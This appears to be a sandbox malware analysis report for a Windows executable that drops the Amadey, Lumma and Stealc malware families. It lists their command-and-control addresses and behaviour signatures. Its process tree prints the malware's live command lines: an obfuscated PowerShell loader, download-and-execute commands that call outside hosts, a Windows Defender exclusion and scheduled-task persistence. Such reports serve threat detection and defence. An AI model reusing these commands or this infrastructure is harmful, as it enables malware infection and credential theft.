Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/03/2025, 02:33

General

  • Target

    c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe

  • Size

    1.9MB

  • MD5

    5b1dbccb1977e33fae7e0efa78e96b49

  • SHA1

    fd97d5e5080b0130e21f998ed33b47997dd87d84

  • SHA256

    c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77

  • SHA512

    62de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8

  • SSDEEP

    49152:GbH3jNl9hAMO18bTKiyyGqxcyO1iQwLoFha7:GbHB72buXmA0iVLoFC

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://fostinjec.today/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://5orangemyther.live/api

https://sfostinjec.today/api

https://rsterpickced.digital/api

https://dawtastream.bet/api

https://foresctwhispers.top/api

https://tracnquilforest.life/api

https://xcollapimga.fun/api

https://strawpeasaen.fun/api

https://jquietswtreams.life/api

https://starrynsightsky.icu/api

https://earthsymphzony.today/api

https://defaulemot.run/api

https://.garagedrootz.top/api

https://orangemyther.live/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 9 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 58 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3420
      • C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
        "C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1968
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1720
          • C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe
            "C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3928
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4536
              • C:\Windows\SysWOW64\expand.exe
                expand Ae.msi Ae.msi.bat
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1836
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4844
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "opssvc wrsa"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:5096
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4444
              • C:\Windows\SysWOW64\findstr.exe
                findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4440
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c md 789919
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3660
              • C:\Windows\SysWOW64\extrac32.exe
                extrac32 /Y /E Deviation.msi
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2056
              • C:\Windows\SysWOW64\findstr.exe
                findstr /V "Brian" Challenges
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3956
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                6⤵
                • System Location Discovery: System Language Discovery
                PID:988
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4200
              • C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
                Occupation.com q
                6⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:4592
                • C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                  C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3848
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    8⤵
                    • Accesses Microsoft Outlook profiles
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    • outlook_office_path
                    • outlook_win_path
                    PID:5572
              • C:\Windows\SysWOW64\choice.exe
                choice /d y /t 5
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1556
          • C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe
            "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
            4⤵
            • Downloads MZ/PE file
            • Executes dropped EXE
            PID:1616
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2188
            • C:\Users\Admin\AppData\Local\Temp\micE72.tmp.exe
              C:\Users\Admin\AppData\Local\Temp\micE72.tmp.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1544
            • C:\Windows\SYSTEM32\cmd.exe
              cmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
              5⤵
                PID:3704
            • C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe
              "C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:3676
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c 67cc62a429f2f.vbs
                5⤵
                • Checks computer location settings
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:2420
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
                  6⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:4452
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4444
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                      8⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4308
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                        9⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4600
            • C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe
              "C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"
              4⤵
              • Executes dropped EXE
              PID:3572
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /sc minute /mo 1 /tn MyTask /tr ""C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Suh\niga.jar"" /F
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3524
            • C:\Users\Admin\AppData\Local\Temp\10147600101\1ecf164df8.exe
              "C:\Users\Admin\AppData\Local\Temp\10147600101\1ecf164df8.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2436
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn uwTdvmajKke /tr "mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta" /sc minute /mo 25 /ru "Admin" /f
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4164
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn uwTdvmajKke /tr "mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta" /sc minute /mo 25 /ru "Admin" /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4532
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta
                5⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:2096
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3020
                  • C:\Users\Admin\AppData\Local\TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE
                    "C:\Users\Admin\AppData\Local\TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE"
                    7⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    PID:2084
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10147610121\am_no.cmd" "
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3356
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                5⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:956
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:948
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4116
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                5⤵
                • System Location Discovery: System Language Discovery
